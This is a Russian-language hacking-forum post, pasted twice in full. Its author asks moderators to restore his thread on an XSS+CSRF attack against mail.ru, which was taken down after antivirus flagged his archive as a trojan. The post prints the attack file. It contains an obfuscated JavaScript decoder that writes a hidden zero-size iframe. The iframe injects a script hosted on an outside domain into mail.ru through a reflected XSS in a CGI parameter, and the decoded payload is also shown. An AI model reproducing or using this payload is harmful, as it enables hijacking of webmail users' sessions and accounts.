iSee
29.01.2009, 10:37
На днях создал тему про XSS+CSRF атаку на mail.ru.
И на архив который был прикреплен в теме, жаловался антивирус и говорил что там Trojan-Clicker.HTML.IFrame.fh
Объясню почему архив вызвал такую реакцию у антивируса. В архиве был файл my_ass.html и в его содержании были следующие строки:
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!111!110!76!111!97!100 !61!34!106!97!118!97!115!99!114!105!112!116!58!111 !108!40!41!59!34!32!115!114!99!61!34!104!116!116!1 12!58!47!47!108!105!115!116!46!109!97!105!108!46!1 14!117!47!99!103!105!45!98!105!110!47!111!108!121! 109!112!105!99!95!99!97!108!101!110!100!97!114!46! 99!103!105!63!115!112!111!114!116!61!37!51!67!47!1 16!101!120!116!97!114!101!97!37!51!69!37!50!55!37! 50!50!37!51!69!37!50!48!45!45!37!51!69!37!51!67!11 5!99!114!105!112!116!37!50!48!115!114!99!61!104!11 6!116!112!58!47!47!111!110!101!100!51!55!114!46!10 4!49!55!46!114!117!47!106!115!46!106!115!37!51!69! 37!51!67!47!115!99!114!105!112!116!37!51!69!34!32! 110!97!109!101!61!34!115!102!114!97!109!101!34!32! 105!100!61!34!115!102!114!97!109!101!34!32!119!105 !100!116!104!61!34!48!34!32!104!101!105!103!104!11 6!61!34!48!34!32!115!99!114!111!108!108!105!110!10 3!61!34!110!111!34!32!102!114!97!109!101!98!111!11 4!100!101!114!61!34!48!34!32!115!116!121!108!101!6 1!34!100!105!115!112!108!97!121!58!32!110!111!110! 101!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
Но это не вирус! Это закодированный <iframe> со следующим содержанием:
<iframe onLoad="javascript:ol();" src="http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%20--%3E%3Cscript%20src=http://oned37r.h17.ru/js.js%3E%3C/script%3E" name="sframe" id="sframe" width="0" height="0" scrolling="no" frameborder="0" style="display: none"></iframe>
Кодировал через: http://coder.pajed.com/
А так как у меня небыло на тот момент когда создавалась тема антивируса, о проблеме я не знал. Прошу модераторов востановить тему, что бы я мог перезалить архив
Собственно вот.
И на архив который был прикреплен в теме, жаловался антивирус и говорил что там Trojan-Clicker.HTML.IFrame.fh
Объясню почему архив вызвал такую реакцию у антивируса. В архиве был файл my_ass.html и в его содержании были следующие строки:
<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!111!110!76!111!97!100 !61!34!106!97!118!97!115!99!114!105!112!116!58!111 !108!40!41!59!34!32!115!114!99!61!34!104!116!116!1 12!58!47!47!108!105!115!116!46!109!97!105!108!46!1 14!117!47!99!103!105!45!98!105!110!47!111!108!121! 109!112!105!99!95!99!97!108!101!110!100!97!114!46! 99!103!105!63!115!112!111!114!116!61!37!51!67!47!1 16!101!120!116!97!114!101!97!37!51!69!37!50!55!37! 50!50!37!51!69!37!50!48!45!45!37!51!69!37!51!67!11 5!99!114!105!112!116!37!50!48!115!114!99!61!104!11 6!116!112!58!47!47!111!110!101!100!51!55!114!46!10 4!49!55!46!114!117!47!106!115!46!106!115!37!51!69! 37!51!67!47!115!99!114!105!112!116!37!51!69!34!32! 110!97!109!101!61!34!115!102!114!97!109!101!34!32! 105!100!61!34!115!102!114!97!109!101!34!32!119!105 !100!116!104!61!34!48!34!32!104!101!105!103!104!11 6!61!34!48!34!32!115!99!114!111!108!108!105!110!10 3!61!34!110!111!34!32!102!114!97!109!101!98!111!11 4!100!101!114!61!34!48!34!32!115!116!121!108!101!6 1!34!100!105!115!112!108!97!121!58!32!110!111!110! 101!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>
Но это не вирус! Это закодированный <iframe> со следующим содержанием:
<iframe onLoad="javascript:ol();" src="http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%20--%3E%3Cscript%20src=http://oned37r.h17.ru/js.js%3E%3C/script%3E" name="sframe" id="sframe" width="0" height="0" scrolling="no" frameborder="0" style="display: none"></iframe>
Кодировал через: http://coder.pajed.com/
А так как у меня небыло на тот момент когда создавалась тема антивируса, о проблеме я не знал. Прошу модераторов востановить тему, что бы я мог перезалить архив
Собственно вот.